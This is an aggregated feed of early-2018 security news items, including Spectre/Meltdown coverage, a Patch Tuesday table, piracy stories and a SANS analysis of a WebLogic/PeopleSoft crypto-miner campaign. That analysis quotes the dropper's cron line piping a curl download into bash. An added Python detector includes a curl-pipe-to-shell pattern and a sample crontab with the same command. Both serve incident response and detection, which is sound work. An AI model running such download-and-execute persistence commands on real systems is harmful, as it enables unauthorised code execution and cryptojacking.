We want to develop a comprehensive understanding of anti-adblockers, with the ultimate aim of enabling adblockers to bypass state-of-the-art anti-adblockers. In this paper, we present a differential execution analysis to automatically detect and analyze anti-adblockers. At a high level, we collect execution traces by visiting a website with and without adblockers. Through differential execution analysis, we are able to pinpoint the conditions that lead to the differences caused by anti-adblocking code. Using our system, we detect anti-adblockers on 30.5% of the Alexa top-10K websites which is 5-52 times more than reported in prior literature. Unlike prior work which is limited to detecting visible reactions (e.g., warning messages) by anti-adblockers, our system can discover attempts to detect adblockers even when there is no visible reaction. From manually checking one third of the detected websites, we find that the websites that have no visible reactions constitute over 90% of the cases, completely dominating the ones that have visible warning messages. Finally, based on our findings, we further develop JavaScript rewriting and API hooking based solutions (the latter implemented as a Chrome extension) to help adblockers bypass state-of-the-art anti-adblockers.
News article.
notmuch release 0.26 now available Version 0.26 of the notmuch email client/indexer is available with a long list of new features. "It's now possible to include the cleartext of encrypted e-mails in the notmuch index. This makes it possible to search your encrypted e-mails with the same ease as searching cleartext."
Spectre and Meltdown Attacks
After a week or so of rumors, everyone is now reporting about the Spectre and Meltdown attacks against pretty much every modern processor out there.
These are side-channel attacks where one process can spy on other processes. They affect computers where an untrusted browser window can execute code, phones that have multiple apps running at the same time, and cloud computing networks that run lots of different processes at once. Fixing them either requires a patch that results in a major performance hit, or is impossible and requires a re-architecture of conditional execution in future CPU chips.
I'll be writing something for publication over the next few days. This post is basically just a link repository.
EDITED TO ADD: Good technical explanation. And a Slashdot thread.
EDITED TO ADD (1/5): Another good technical description. And how the exploits work through browsers. A rundown of what vendors are doing. Nicholas Weaver on its effects on individual computers.
EDITED TO ADD (1/7): xkcd.
EDITED TO ADD (1/10): Another good technical description.
Nearly social, on Linkedin
I am getting nearly social on Linkedin. Name: Georgi Guninski URL: https://www.linkedin.com/in/georgi-guninski-b0069a156
O'Callahan: The Fight For Patent-Unencumbered Media Codecs Is Nearly Won Robert O'Callahan notes an important development in the fight for media codecs without patent issues. "Apple joining the Alliance for Open Media is a really big deal. Now all the most powerful tech companies — Google, Microsoft, Apple, Mozilla, Facebook, Amazon, Intel, AMD, ARM, Nvidia — plus content providers like Netflix and Hulu are on board. I guess there's still no guarantee Apple products will support AV1, but it would seem pointless for Apple to join AOM if they're not going to use it: apparently AOM membership obliges Apple to provide a royalty-free license to any 'essential patents' it holds for AV1 usage."
Cybersecurity and the 2017 US National Security Strategy
Commentaries on the 2017 US national security strategy by Michael Sulmeyer and Ben Buchanan.
RuTracker Reveals Innovative Plan For Users to Subvert ISP Blocking
As Russia’s largest torrent site and one that earned itself a mention in TF’s list of most popular torrent sites 2018, RuTracker is continuously under fire.
The site has an extremely dedicated following but Russia’s telecoms watchdog, spurred on by copyright holders brandishing court rulings, does everything in its power to ensure that people can’t access the site easily.
As a result, RuTracker’s main domains are blocked by all ISPs, meaning that people have to resort to VPNs or the many dozens of proxy and mirror sites that have been set up to facilitate access to the popular tracker.
While all of these methods used to work just fine, new legislation that came into force during October means that mirror and proxy sites can be added to block lists without copyright holders having to return to court. And, following legislation introduced in November, local VPN services are forbidden from providing access to blocked sites.
While RuTracker has always insisted that web blockades have little effect on the numbers of people sharing content, direct traffic to their main domains has definitely suffered. To solve this problem and go some way towards mitigating VPN and proxy bans, the site has just come up with a new plan to keep the torrents flowing.
The scheme was quietly announced, not on RuTracker’s main forum, but to a smaller set of users on local site Leprosorium. The idea was that a quieter launch there would allow for controlled testing before a release to the masses. The project is called My.RuTracker and here’s how it works.
Instead of blocked users fruitlessly trying to find public circumvention methods that once seen are immediately blocked, they are invited to register their own domains. These can be single use, for the person who registers them, but it’s envisioned that they’ll be shared out between friends, family, and online groups, to better make use of the resource.
Once domains are registered, users are invited to contact a special user account on the RuTracker site (operated by the site’s operators) which will provide them with precise technical details on how to set up their domain (.ru domains are not allowed) to gain access to RuTracker.
“In response, after a while (usually every other day), a list of NS-addresses will be sent to the registrar’s domain settings. Under this scheme, the user domain will be redirected to the RuTracker site via a dynamic IP address: this will avoid blocking the torrent tracker for a particular IP address,” the scheme envisages.
According to local news resource Tjournal, 62 personal mirrors were launched following the initial appeal, with the operators of RuTracker now planning to publicly announce the project to their community. As more are added, the site will keep track of traffic from each of the personal “mirrors” for balancing the load on the site.
At least in theory, this seems like a pretty innovative scheme. Currently, the authorities rely on the scale and public awareness of a particular proxy or mirror in order to earmark it for blocking. This much more decentralized plan, in which only small numbers of people should know each domain, seems like a much more robust system – at least until the authorities, and indeed the law, catch up.
And so the cat-and-mouse game continues.
GitHub InfoSec Threepeat: HELK, ptf, and VulnWhisperer, (Wed, Jan 10th)
There are numerous and exciting information security-related projects on GitHub; one can dive quickly down the rabbit hole, never to be seen again, in an effort to identify the best of breed for use in their security practices. In the last three days, three separate projects have hit my radar screen via social media that I thought readers might find intriguing and likely beneficial. I'm listing the projects in alphabetic order, not order of preference; each project represents a unique discipline and opportunity.
The first project is for hunters. HELK is a Hunting ELK (Elasticsearch, Logstash, Kibana) stack with advanced analytic capabilities, currently in beta. This project hits themes near and dear to me, and will definitely receive toolsmith attention in the near term. From @Cyb3rWard0g, HELK aims to:
- Provide a free hunting platform to the community and share the basics of Threat Hunting.
- Make sense of a large amount of event logs and add more context to suspicious events during hunting.
- Expedite the time it takes to deploy an ELK stack.
- Improve the testing of hunting use cases in an easier and more affordable way.
- Enable Data Science via Apache Spark, GraphFrames & Jupyter Notebooks
Second up, for your consideration, is the just released version 1.17 of ptf, the pentester's framework from Dave Kennedy's @TrustedSec.
The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustomed to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.
PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES).
The 1.17 release includes:
- multiple fixes for aftercommands and escaping
- add Joomslav
- update masscan
- add Robot-Detect
Third on our list is VulnWhisperer, also slotted for future toolsmith attention; it has already caught many an eye and caused some excitement, particularly in light of the Spectre/Meltdown vulnerabilities. VulnWhisperer is a vulnerability data and report aggregator. Austin Taylor's VulnWhisperer will pull all the reports and create a file with a unique filename which is then fed into logstash. Logstash extracts data from the filename and tags all of the information inside the report (see the logstash_vulnwhisp.conf file). Data is then shipped to elasticsearch to be indexed. VulnWhisperer includes support for:
- Nessus (v6 & v7)
- Qualys Web Applications
- Qualys Vulnerability Management (in progress)
- OpenVAS
- Nexpose
- Insight VM
- NMAP
- More to come
This is a great triple threat of GitHub offerings for your review and consideration, I know they're slated for me to do much more exploration.
Feel free to comment with some of your favorite GitHub information security projects.
Cheers.
ISC Stormcast For Wednesday, January 10th 2018 https://isc.sans.edu/podcastdetail.html?id=5819, (Wed, Jan 10th)
Microsoft January 2018 Patch Tuesday, (Tue, Jan 9th)
Microsoft, as expected, included last week's Meltdown/Spectre update in this month's Patch Tuesday. But note that in addition to these two flaws, we have a number of other "traditional" privilege escalation and even remote code execution flaws that are probably easier to exploit and should probably be treated with a higher priority. Regardless, I doubt that as many people will work overtime for these run-of-the-mill flaws. For example:
CVE-2018-0788: A quick NVD search shows 15 different vulnerabilities for this Atmfd.dll. Some can even lead to code execution. But I doubt you will have this issue patched this week. Exploitation of CVE-2018-0788 can lead to code execution as administrator. Spectre/Meltdown only allow reading data.
CVE-2018-0773: An attacker may execute arbitrary code in the context of the user running the browser. Spectre, which was patched in many browsers, again only allows reading data.
and CVE-2018-0802, which is already being exploited.
So better get patching. It worked so well last month :)
January 2018 Security Updates
| CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity |
|---|---|---|---|---|---|
| .NET Security Feature Bypass Vulnerability | | | | | |
| CVE-2018-0786 | No | No | Less Likely | Less Likely | Important |
| .NET and .NET Core Denial Of Service Vulnerability | | | | | |
| CVE-2018-0764 | No | No | Unlikely | Unlikely | Important |
| ASP.NET Core Cross Site Request Forgery Vulnerability | | | | | |
| CVE-2018-0785 | No | No | Unlikely | Unlikely | Moderate |
| ASP.NET Core Elevation Of Privilege Vulnerability | | | | | |
| CVE-2018-0784 | No | No | Less Likely | Less Likely | Important |
| Guidance to mitigate speculative execution side-channel vulnerabilities | | | | | |
| ADV180002 | No | No | Less Likely | Less Likely | Important |
| January 2018 Adobe Flash Security Update | | | | | |
| ADV180001 | No | No | - | - | Critical |
| Microsoft Access Tampering Vulnerability | | | | | |
| CVE-2018-0799 | No | No | Unlikely | Unlikely | Important |
| Microsoft Color Management Information Disclosure Vulnerability | | | | | |
| CVE-2018-0741 | No | No | - | - | Important |
| Microsoft Edge Elevation of Privilege Vulnerability | | | | | |
| CVE-2018-0803 | No | No | - | - | Important |
| Microsoft Edge Information Disclosure Vulnerability | | | | | |
| CVE-2018-0766 | No | No | Unlikely | Unlikely | Important |
| Microsoft Excel Remote Code Execution Vulnerability | | | | | |
| CVE-2018-0796 | No | No | Less Likely | Less Likely | Important |
| Microsoft Office Defense in Depth Update | | | | | |
| ADV180003 | No | No | - | - | None |
| Microsoft Office Memory Corruption Vulnerability | | | | | |
| CVE-2018-0802 | No | Yes | Unlikely | Unlikely | Important |
| CVE-2018-0798 | No | No | Less Likely | Less Likely | Important |
| Microsoft Office Remote Code Execution Vulnerability | | | | | |
| CVE-2018-0795 | No | No | - | - | Important |
| Microsoft Office Remote Code Execution Vulnerability | | | | | |
| CVE-2018-0801 | No | No | Less Likely | Less Likely | Important |
| Microsoft Outlook Remote Code Execution Vulnerability | | | | | |
| CVE-2018-0791 | No | No | Less Likely | Less Likely | Important |
| CVE-2018-0793 | No | No | More Likely | More Likely | Important |
| Microsoft SharePoint Cross Site Scripting Elevation of Privilege Vulnerability | | | | | |
| CVE-2018-0790 | No | No | Less Likely | Less Likely | Important |
| Microsoft SharePoint Elevation of Privilege Vulnerability | | | | | |
| CVE-2018-0789 | No | No | Less Likely | Less Likely | Important |
| Microsoft Word Memory Corruption Vulnerability | | | | | |
| CVE-2018-0812 | No | No | Unlikely | Unlikely | Important |
| CVE-2018-0797 | No | No | Less Likely | Less Likely | Critical |
| Microsoft Word Remote Code Execution Vulnerability | | | | | |
| CVE-2018-0805 | No | No | Unlikely | Unlikely | Important |
| CVE-2018-0806 | No | No | Unlikely | Unlikely | Important |
| CVE-2018-0807 | No | No | Unlikely | Unlikely | Important |
| Microsoft Word Remote Code Execution Vulnerability | | | | | |
| CVE-2018-0804 | No | No | Unlikely | Unlikely | Low |
| CVE-2018-0792 | No | No | Less Likely | Less Likely | Important |
| CVE-2018-0794 | No | No | More Likely | More Likely | Important |
| OpenType Font Driver Elevation of Privilege Vulnerability | | | | | |
| CVE-2018-0788 | No | No | More Likely | More Likely | Important |
| OpenType Font Driver Information Disclosure Vulnerability | | | | | |
| CVE-2018-0754 | No | No | More Likely | More Likely | Important |
| SMB Server Elevation of Privilege Vulnerability | | | | | |
| CVE-2018-0749 | No | No | Less Likely | Less Likely | Important |
| Scripting Engine Information Disclosure Vulnerability | | | | | |
| CVE-2018-0800 | No | No | Less Likely | Less Likely | Critical |
| CVE-2018-0767 | No | No | Unlikely | Unlikely | Critical |
| CVE-2018-0780 | No | No | - | - | Critical |
| Scripting Engine Memory Corruption Vulnerability | | | | | |
| CVE-2018-0773 | No | No | - | - | Critical |
| CVE-2018-0774 | No | No | - | - | Critical |
| CVE-2018-0781 | No | No | Unlikely | Unlikely | Critical |
| CVE-2018-0758 | No | No | - | - | Critical |
| CVE-2018-0762 | No | No | More Likely | More Likely | Critical |
| CVE-2018-0768 | No | No | Less Likely | Less Likely | Important |
| CVE-2018-0769 | No | No | - | - | Critical |
| CVE-2018-0770 | No | No | - | - | Critical |
| CVE-2018-0772 | No | No | - | - | Critical |
| CVE-2018-0775 | No | No | - | - | Critical |
| CVE-2018-0776 | No | No | - | - | Critical |
| CVE-2018-0777 | No | No | - | - | Critical |
| CVE-2018-0778 | No | No | Unlikely | Unlikely | Critical |
| Scripting Engine Security Feature Bypass | | | | | |
| CVE-2018-0818 | No | No | Unlikely | Unlikely | Important |
| Spoofing Vulnerability in Microsoft Office for MAC | | | | | |
| CVE-2018-0819 | Yes | No | Less Likely | Less Likely | Important |
| Windows Elevation of Privilege Vulnerability | | | | | |
| CVE-2018-0748 | No | No | Less Likely | Less Likely | Important |
| CVE-2018-0751 | No | No | Less Likely | Less Likely | Important |
| CVE-2018-0752 | No | No | Less Likely | Less Likely | Important |
| CVE-2018-0744 | No | No | More Likely | More Likely | Important |
| Windows GDI Information Disclosure Vulnerability | | | | | |
| CVE-2018-0750 | No | No | More Likely | More Likely | Important |
| Windows IPSec Denial of Service Vulnerability | | | | | |
| CVE-2018-0753 | No | No | - | - | Important |
| Windows Information Disclosure Vulnerability | | | | | |
| CVE-2018-0746 | No | No | More Likely | More Likely | Important |
| CVE-2018-0747 | No | No | More Likely | More Likely | Important |
| CVE-2018-0745 | No | No | More Likely | More Likely | Important |
| Windows Subsystem for Linux Elevation of Privilege Vulnerability | | | | | |
| CVE-2018-0743 | No | No | Less Likely | Less Likely | Important |
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
What is going on with port 3333?, (Tue, Jan 9th)
We've seen a spike over the last day or so in reports of apparent scanning on TCP port 3333. I have serious doubts that anyone is actually looking for DEC Notes, which is the registered IANA use for this port. While we're getting our own honeypots set up, I figured I'd ask our readers: do you have packets and/or any idea what is going on here? Please let us know in the comments or via our contact page. Thanx in advance.
Update: 2018-01-09 03:00 The original version of this diary inadvertently said the traffic was UDP; the traffic that I am seeing in my logs at home is actually TCP. My apologies for the confusion.
Update: 2018-01-10 00:00 UTC The recurring theme in comments and email we've received suggests that some of the recent Monero miner malware samples are sending their results back to C2 servers on port 3333, so perhaps folks are trying to find and steal the ill-gotten cryptocurrency. I still haven't examined any traffic captured by our honeypots to confirm or refute that this is what they are looking for.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu
January 09, 2018
[$] A look at the handling of Meltdown and Spectre
The Meltdown/Spectre debacle has, deservedly, reached the mainstream press and, likely, most of the public that has even a remote interest in computers and security. It only took a day or so from the accelerated disclosure date of January 3—it was originally scheduled for January 9—before the bugs were making big headlines. But Spectre has been known for at least six months and Meltdown for nearly as long—at least to some in the industry. Others that were affected were completely blindsided by the announcements and have joined the scramble to mitigate these hardware bugs before they bite users. Whatever else can be said about Meltdown and Spectre, the handling (or, in truth, mishandling) of this whole incident has been a horrific failure.
Tails 3.4 is out The privacy focused Tails distribution has released version 3.4. This release updates the kernel to 4.14.12 to include the latest Meltdown and Spectre patches. Many other security issues have been fixed in this release, and users should upgrade.
[$] A new kernel polling interface Polling a set of file descriptors to see which ones can perform I/O without blocking is a useful thing to do — so useful that the kernel provides three different system calls (select(), poll(), and epoll_wait() — plus some variants) to perform it. But sometimes three is not enough; there is now a proposal circulating for a fourth kernel polling interface. As is usually the case, the motivation for this change is performance.
Daniel Miessler on My Writings about IoT Security
Daniel Miessler criticizes my writings about IoT security:
I know it's super cool to scream about how IoT is insecure, how it's dumb to hook up everyday objects like houses and cars and locks to the internet, how bad things can get, and I know it's fun to be invited to talk about how everything is doom and gloom.
I absolutely respect Bruce Schneier a lot for what he's contributed to InfoSec, which makes me that much more disappointed with this kind of position from him.
InfoSec is full of those people, and it's beneath people like Bruce to add their voices to theirs. Everyone paying attention already knows it's going to be a soup sandwich -- a carnival of horrors -- a tragedy of mistakes and abuses of trust.
It's obvious. Not interesting. Not novel. Obvious. But obvious or not, all these things are still going to happen.
I actually agree with everything in his essay. "We should obviously try to minimize the risks, but we don't do that by trying to shout down the entire enterprise." Yes, definitely.
I don't think the IoT must be stopped. I do think that the risks are considerable, and will increase as these systems become more pervasive and susceptible to class breaks. And I'm trying to write a book that will help navigate this. I don't think I'm the prophet of doom, and don't want to come across that way. I'll give the manuscript another read with that in mind.
A Story About PeopleSoft: How to Make $250k Without Leaving Home., (Mon, Jan 8th)
Yesterday, Renato published a diary about an intrusion taking advantage of a recent flaw in WebLogic. Oracle’s WebLogic is a Java EE application server [1]. PeopleSoft, another popular Oracle product can use WebLogic as a web server. PeopleSoft itself is a complex enterprise process management system. The name implies human resource functions, but the software goes way beyond simple HR features. Typically, “everything” in an organization lives in PeopleSoft [2].
As you can probably imagine, a compromise of a PeopleSoft system is pretty much a worst-case compromise for an organization.
When Renato got involved in the incident he described on Monday, he was surprised that the “only” thing he found was a crypto coin miner. An attacker would probably have been able to do a lot more damage to an organization by exfiltrating the data that lives on the system or, worse, modifying it.
The Vulnerability
The vulnerability exploited, CVE-2017-10271 has a CVSS score of 9.8 (Critical) and is easily exploitable. In October 2017 Oracle released a patch as part of its quarterly Critical Patch Update.
At the end of December, Lian Zhang, a Chinese security researcher, released an exploit script for this vulnerability. Lian's post may not be the first, but this looks like the exploit that was used in the attack discussed here, and the post appears to have started an increased interest in this flaw. Lian’s blog is talking about CVE-2017-3506, but the exploit matches CVE-2017-10271. Oracle’s April CPU patched CVE-2017-3506, but it didn’t do so completely, leaving an opening that led to CVE-2017-10271.
Either way, you could probably call it either vulnerability. The cause is, as so often, insecure deserialization. Oracle’s fix was to add a validate method that checks whether an object is passed and, if it is, throws an exception. Probably the best blog post I found about these two vulnerabilities and how they relate is [5].
What Happened Next
Starting at the end of December, first reports were published about this exploit being used to install crypto miners. We did see a couple of different URLs being used to install the miner:
hxxp://165.227.215. 25 – the base URL reported by Renato yesterday. No longer reachable
hxxp://www.viewyng. com/includes/libraries – base URL for another victim. Still reachable as of today (1/9/2018).
Hxxp://letoscribe. ru/includes – base URL observed by another victim. Still reachable as of today (1/9/2018)
The exploit will download a simple bash file that will:
- Find a working directory (/tmp, /var/tmp or ${PWD}, the current directory)
- Kill any existing miners on the system
- Create a CRON job to download the miner:
  3 2,5,8,11,14,17,30 * * * curl -s \"$setupurl\" | bash" > "${cronfile}"
- Create a subdirectory ".X1MUnix"
- Download the miner (either called xmrig or fs-manager)
The Miner
The miner, xmrig, is not exactly malware. It is a legit crypto coin miner for Monero. The miner comes with a configuration file showing us where the money will go that is mined using this application. Renato was able to recover one such configuration file, and the pool the miner was connecting to does show that up to this point, 611 Monero coins were mined by this user, which amounts to about $226,070 currently. The hash rate of this user, 450 KH/s, would only support $31k per month, so this user may have been at it for a while, or some systems were already cleaned up and are no longer participating in the effort.
Renato also recovered files from another campaign using the same vulnerability. This group opted for mining AEON instead of Monero. Even though they are achieving a similar hash rate, they only earned about $6k so far. Maybe they will switch to Monero after reading this.
The Victims
The exploited vulnerability affects WebLogic, but we did see some PeopleSoft servers exploited. PeopleSoft, being a very complex application, is difficult to patch and maintain. The exploit bash script will “register” new victims with the attacker’s server, and we managed to get a hold of one of the logs left behind by the attacker. The log started on January 4th at 8 am ET. It is still seeing new connections right now (January 9th, 8 am ET). The last log I retrieved includes 722 IP addresses.
Based on a quick reverse DNS lookup and an ASN lookup, I found a high concentration of affected IPs at cloud providers. This isn’t a surprise since many organizations are moving their most critical data to the cloud to make it easier for the bad guys to get to it. Also, not a big surprise is the relatively high percentage of IPs in Oracle’s cloud. The exploit does attack a key Oracle component.

The victims are distributed worldwide. This isn’t a targeted attack. Once the exploit was published, anybody with limited scripting skills was able to participate in taking down WebLogic (/PeopleSoft) servers.

(image credit: Renato Marinho)
If You Are a Victim
Please DO NOT stop your incident response by removing the miner. Your server was vulnerable to an easily executed remote code execution exploit. It is very likely that more sophisticated attackers used this to gain a persistent foothold on the system. In this case, the only “persistence” we noticed was the CRON job. But there are many more, and more difficult to detect, ways to gain persistence.
Indicators of Compromise:
- High CPU Utilization
- Outbound connections to a mining pool (we observed in particular connections to hashvault.pro and these IPs: 145.239.0.84, 104.207.141.144 and 45.76.198.204). Note that some mining pools are behind proxy services like Cloudflare, so these may be shared IPs. The same is true for our "Miner IP" feed [6].
- Hashes:
7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c fs-manager
d7d6ed5b968858699c2f6aee6a0024a4c9574f1c2153f46940476e15194f848e xmrig-y
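As an added example (not code from the ISC diaries or their authors), the following Python checks a host and a flow log against the indicators above: the curl-pipe-to-bash cron persistence, the .X1MUnix working directory, the two file hashes and outbound connections to the listed pool host and IPs. It also covers the earlier port-3333 diary on this page by flagging external sources that probe TCP/3333 across several internal hosts. The key=value flow-log format, the sample addresses, the crontab and the miner-host.invalid URL are constructed for the example; the hashes, pool host, pool IPs and directory name are the ones quoted in the article.

```python
import hashlib
import re

# Indicators quoted from the article above (hashes, pool host and IPs, miner directory).
MINER_HASHES = {
    "7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c": "fs-manager",
    "d7d6ed5b968858699c2f6aee6a0024a4c9574f1c2153f46940476e15194f848e": "xmrig-y",
}
POOL_HOSTS = {"hashvault.pro"}
POOL_IPS = {"145.239.0.84", "104.207.141.144", "45.76.198.204"}
MINER_DIR = ".X1MUnix"

# The dropper's persistence is a cron entry that pipes a curl download straight into a shell.
CURL_PIPE_SHELL = re.compile(r"\bcurl\s+(?:-s|--silent)\b[^|]*\|\s*(?:ba)?sh\b")

# Constructed sample data (not from the article): a crontab, some file paths and a
# simplified firewall/flow log in key=value form. The URL host is a placeholder.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
3 2,5,8,11,14,17,30 * * * curl -s "http://miner-host.invalid/setup.sh" | bash
"""
PATHS = ["/tmp/.X1MUnix/xmrig", "/var/tmp/.X1MUnix/fs-manager", "/opt/weblogic/server.log"]
FLOW_LOG = """\
2018-01-09T02:14:07Z proto=tcp dir=out src=10.0.0.5 spt=44112 dst=145.239.0.84 dpt=3333
2018-01-09T02:14:09Z proto=tcp dir=out src=10.0.0.5 spt=44113 dst=93.184.216.34 dpt=443
2018-01-09T02:15:01Z proto=tcp dir=in src=198.51.100.7 spt=51000 dst=10.0.0.5 dpt=3333
2018-01-09T02:15:01Z proto=tcp dir=in src=198.51.100.7 spt=51001 dst=10.0.0.6 dpt=3333
2018-01-09T02:15:02Z proto=tcp dir=in src=198.51.100.7 spt=51002 dst=10.0.0.7 dpt=3333
2018-01-09T02:15:05Z proto=tcp dir=in src=203.0.113.9 spt=40000 dst=10.0.0.5 dpt=22
2018-01-09T02:16:00Z proto=udp dir=in src=198.51.100.8 spt=5353 dst=10.0.0.5 dpt=3333
"""
FLOW_RE = re.compile(
    r"proto=(?P<proto>\w+) dir=(?P<dir>\w+) src=(?P<src>\S+) spt=(?P<spt>\d+) "
    r"dst=(?P<dst>\S+) dpt=(?P<dpt>\d+)"
)


def parse_flows(text):
    """Parse the key=value flow log into dicts; ports become ints, unparsable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = FLOW_RE.search(line)
        if m:
            rec = m.groupdict()
            rec["spt"], rec["dpt"] = int(rec["spt"]), int(rec["dpt"])
            records.append(rec)
    return records


def crontab_findings(crontab_text):
    """Cron lines that pipe a download straight into a shell (the persistence seen here)."""
    return [ln for ln in crontab_text.splitlines() if CURL_PIPE_SHELL.search(ln)]


def suspicious_paths(paths):
    """Paths that contain the hidden working directory the dropper creates."""
    return [p for p in paths if MINER_DIR in p.split("/")]


def classify_digest(sha256_hex):
    """Map a SHA-256 hex digest to the miner binary name from the IoC list, or None."""
    return MINER_HASHES.get(sha256_hex.lower())


def file_hash_findings(files):
    """files: {path: bytes}. Returns {path: label} where the content's SHA-256 is a known miner hash."""
    hits = {}
    for path, data in files.items():
        label = classify_digest(hashlib.sha256(data).hexdigest())
        if label:
            hits[path] = label
    return hits


def pool_connections(flow_text):
    """Outbound flows to the mining pool host or IPs listed in the article."""
    return [(r["src"], r["dst"], r["dpt"]) for r in parse_flows(flow_text)
            if r["dir"] == "out" and (r["dst"] in POOL_IPS or r["dst"] in POOL_HOSTS)]


def port_3333_probers(flow_text, min_targets=3):
    """External sources hitting TCP/3333 on at least min_targets distinct internal hosts,
    the inbound pattern the port-3333 diary asks about (UDP ignored, per its correction)."""
    targets = {}
    for r in parse_flows(flow_text):
        if r["proto"] == "tcp" and r["dir"] == "in" and r["dpt"] == 3333:
            targets.setdefault(r["src"], set()).add(r["dst"])
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= min_targets}


if __name__ == "__main__":
    print("cron:", crontab_findings(CRONTAB))
    print("paths:", suspicious_paths(PATHS))
    print("pool:", pool_connections(FLOW_LOG))
    print("port 3333 probers:", port_3333_probers(FLOW_LOG))
```

The pool and hash checks are exact matches on the article's indicators and will go stale as the operators move; the cron and directory checks describe the behaviour of the dropper and survive a change of infrastructure, which is why a response should not stop at deleting the miner binary.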
Acknowledgements
Thanks to our readers who helped us out with this by sharing details about this intrusion. Also thanks to Renato who wrote this up initially and provided much of the data used here. Thanks to Team Cymru’s IP to ASN conversion tools.
[1] http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html
[2] http://www.oracle.com/us/products/applications/peoplesoft-enterprise/overview/index.html
[3] https://nvd.nist.gov/vuln/detail/CVE-2017-10271
[4] http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
[5] https://www.anquanke.com/post/id/92003
[6] https://isc.sans.edu/api/threatlist/miner
---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Media Giant Can Keep Seized Ad Revenue From Pirate Sites
For several decades the MPAA and RIAA have been the prime anti-piracy groups in the United States.
While that may be true, there’s another player making a massive impact, while getting barely any press.
ABS-CBN, the largest media and entertainment company in the Philippines, has filed a series of lawsuits against pirate sites in the US, with the popular streaming portal Fmovies as the biggest target.
The company has already won several cases with damages ranging from a few hundred thousand to millions of dollars. However, the associated injunctions in these cases are perhaps even more significant.
We previously covered how ABS-CBN managed to get court orders to seize domain names, without the defendants getting actively involved. This is also the case in a recent lawsuit where a Florida federal court signed a broad injunction targeting more than two dozen sites that offered the company’s content.
The websites, including abscbn-teleserye.com, dramascools.com, tvnijuan.org, pinoydailyshows.com and weeklywarning.org, may not be known to a broad audience but their domain names have all been suspended, linking to a takedown message instead.
What’s most interesting, however, is that the advertising revenues of these sites were previously frozen. This was done to ensure that ABS-CBN would at least get some money if the defendants failed to respond, a strategy that seems to have paid off.
After the targeted site owners failed to respond, ABS-CBN requested a default judgment with damages for trademark and copyright infringement.
U.S. District Court Judge Cecilia Altonaga has now signed the order, awarding the media company over a million dollars in statutory trademark infringement damages. In addition, several of the sites must also pay copyright infringement damages.

The default judgment also orders associated registrars and registries to hand over the domain names to ABS-CBN. Thus far several domains have been seized already, but some foreign companies have not complied, most likely because they fall outside the US jurisdiction.
The most interesting part of the order, however, is that Judge Altonaga grants ABS-CBN the previously seized advertising revenues.
“All funds currently restrained by the advertising services, networks, and/or platforms […], pursuant to the temporary restraining order and preliminary injunction in this action are to be immediately (within five business days) transferred to Plaintiffs in partial satisfaction of the monetary judgment entered herein against each Defendant,” the Judge writes.

The sites in question used advertising services from a variety of well-known networks, including Google Adsense, MGID, Popads, AdsKeeper, and Bidvertiser. None of these companies responded in court after the initial seizure order, suggesting that they did not object.
This is the first time, to our knowledge, that a copyright holder has been granted advertising revenue from pirate sites in this manner. While it’s not known how much revenue the sites were making, there is bound to be some.
This could be a common legal tactic going forward because, generally speaking, it is very hard to get money from defaulting defendants who are relatively anonymous, or living in a foreign jurisdiction. By going after the advertisers, copyright holders have a good chance of securing some money, at least.
—
A copy of the default judgment is available here (pdf) and all affected websites are listed below.
– abscbn-teleserye.com
– astigvideos.com
– cinepinoy.lol
– cinepinoy.ag
– pinoyflix.ag
– pinoyflix.lol
– cinezen.me
– dramascools.com
– dramasget.com
– frugalpinoytv.org
– lambingan.cn
– pinoylambingan.ph
– lambingan.io
– lambingans.net
– latestpinoymovies.com
– pinasnews.net
– pinastvreplay.com
– pinoybay.ch
– pinoychannel.me
– pinoydailyshows.com
– pinoyplayback.net
– pinoytvshows.net
– pinoytv-shows.net
– rondownload.net
– sarapmanood.com
– tambayanshow.net
– thelambingan.com
– tvnijuan.org
– tvtambayan.org
– vianowpe.com
– weeklywarning.org
– weeklywarning.com
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Security updates for Tuesday Security updates have been issued by Arch Linux (graphicsmagick and linux-lts), CentOS (thunderbird), Debian (kernel, opencv, php5, and php7.0), Fedora (electrum), Gentoo (libXfont), openSUSE (gimp, java-1_7_0-openjdk, and libvorbis), Oracle (thunderbird), Slackware (irssi), SUSE (kernel, kernel-firmware, and kvm), and Ubuntu (awstats, nvidia-graphics-drivers-384, python-pysaml2, and tomcat7, tomcat8).
[$] Is it time for open processors? The disclosure of the Meltdown and Spectre vulnerabilities has brought a new level of attention to the security bugs that can lurk at the hardware level. Massive amounts of work have gone into improving the (still poor) security of our software, but all of that is in vain if the hardware gives away the game. The CPUs that we run in our systems are highly proprietary and have been shown to contain unpleasant surprises (the Intel management engine, for example). It is thus natural to wonder whether it is time to make a move to open-source hardware, much like we have done with our software. Such a move may well be possible, and it would certainly offer some benefits, but it would be no panacea.
NSA Morale
The Washington Post is reporting that poor morale at the NSA is causing a significant talent shortage. A November New York Times article said much the same thing.
The articles point to many factors: the recent reorganization, low pay, and the various leaks. I have been saying for a while that the Shadow Brokers leaks have been much more damaging to the NSA -- both to morale and operating capabilities -- than Edward Snowden. I think it'll take most of a decade for them to recover.
Tech Companies Meet EC to Discuss Removal of Pirate & Illegal Content
Thousands, perhaps millions, of pieces of illegal content flood onto the Internet every single day, a problem that's only increasing with each passing year.
In the early days of the Internet very little was done to combat the problem but with the rise of social media and millions of citizens using it to publish whatever they like – not least terrorist propaganda and racist speech – governments around the world are beginning to take notice.
